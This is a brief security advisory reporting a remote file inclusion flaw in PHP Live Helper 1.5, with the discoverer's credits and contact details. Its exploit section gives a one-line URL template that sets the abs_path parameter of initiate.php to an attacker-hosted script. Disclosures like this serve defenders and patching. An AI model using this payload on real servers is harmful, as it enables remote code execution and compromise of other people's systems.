PHP Live Helper version 1.5 suffers from a remote file inclusion flaw. Earlier versions may be affected as well.
8360f4f8f336fa4669749cc2c903f90fd5054263cd17fed1bd8dfdd22c25cc1f
---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*
-------------------------------- [ END ] ----------------------------------